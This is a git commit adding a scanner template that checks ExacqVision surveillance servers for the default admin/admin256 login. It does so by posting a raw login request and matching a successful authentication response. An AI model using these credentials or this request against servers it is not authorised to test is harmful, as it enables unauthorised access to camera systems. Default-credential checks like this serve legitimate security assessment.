Added exacqvision-default-credentials

patch-1
sandeep 2021-07-26 16:17:38 +05:30
parent b78eceb857
commit 54e72e7a3b
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: exacqvision-default-credentials
info:
name: ExacqVision Default Password
author: ELSFA7110
severity: high
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
requests:
- raw:
- |
POST /service.web HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
action=login&u=admin&p=admin256
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/json"
- type: word
part: body
condition: and
words:
- '"auth":'
- '"success": true'